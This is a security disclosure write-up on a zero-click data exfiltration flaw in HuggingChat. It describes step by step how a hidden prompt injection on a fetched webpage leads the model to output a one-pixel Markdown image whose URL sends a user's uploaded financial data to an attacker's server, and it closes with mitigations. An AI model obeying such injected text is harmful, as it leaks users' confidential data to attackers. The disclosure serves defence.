Threat Intelligence

Table of Content

Table of Content

Table of Content

A One Pixel Image can Leak Your Data in HuggingChat

HuggingChat (HuggingFace’s app for chatting with models) has been found vulnerable to zero-click data exfiltration risks via indirect prompt injection. 

Confidential revenue data is leaked after a prompt injection in a webpage manipilates HuggingChat to render an unsafe 1 pixel image.

By including a malicious instruction in a document, webpage, MCP tool response, or other data source, an attacker can manipulate models in HuggingChat to output unsafe, dynamically generated Markdown images that exfiltrate data from other sources the AI has access to when they are rendered in the chat.

This vulnerability was responsibly disclosed to HuggingFace on 12/3/2025. As HuggingFace’s security team has not responded to the disclosure, we are disclosing publicly to ensure users are informed of the risks and can take precautions accordingly.

In this article, we demonstrate that an injection in a webpage can manipulate an AI model to output a malicious Markdown image that exfiltrates confidential financial data from a user’s uploaded document.
 

The Attack Chain

  1. The user uploads a document with financial data and adds an external ‘reviews’ website to the chat context using ‘Fetch from URL’.

    1. The user uploads a sensitive document (.txt with financial data) using ‘Add text file > Upload from device’.

      A file containing end-of-quarter financial data (revenue and costs) and a project name indicating that the contents are confidential.


    2. The user adds an untrusted data source (user reviews on an external site) to the model’s context window using ‘add text file > Fetch from URL’. This website looks benign to the user reading it, but contains a hidden prompt injection visible to the LLM.

      An external website with platform reviews is added as context in the chat. The site appears benign, with no evident malicious content.


  2. The user makes a query, asking about the negative review on the website.

    The user enters a query asking how they can re-engage 'Jordan P' who left a bad review on the reviews site.


  3. The model reads the prompt injection and is manipulated into constructing a malicious Markdown image.

    The AI model begins its response by stating that to re-engage the user that left a bad review,  the user will need to be provided a visual of quarterly financials.

    Here, the model output indicates that it believes it must build a visual to provide the negative reviewer (this is what the prompt injection requested the model to do).

    Now, the model outputs Markdown syntax to create a malicious image. In the Markdown syntax, the image's source URL contains an attacker-controlled domain and data from the user’s uploaded file stored in query parameters.

    When the Markdown syntax is processed by the user's browser, a request is made to the attacker's server, retrieving a 1-pixel image.

    The AI model outputs insecure Markdown syntax, resulting in the rendering of an untrusted 1 pixel large image. The URL used to retrieve the image contains the quarterly financial data appended to the attacker's domain.


  4. The attacker can read the user’s financial data from their server logs.

    When the user's browser makes a request to retrieve the 1-pixel image from the attacker's domain, the financial data stored in the query parameters is transmitted with the request. Then, the attacker can read the financial data from the user’s uploaded file in their server logs:

    Quarterly financials data (revenue and costs) are visible in the attackers server logs.
  1. Programmatically prohibit the rendering of Markdown images from external sites in model outputs without explicit user approval (e.g., add a warning confirmation asking the user if they would like to render the image, displaying the full URL being requested before the image is inserted).

  2. Implement a strong Content Security Policy. This will prevent network requests from being made to unapproved external domains.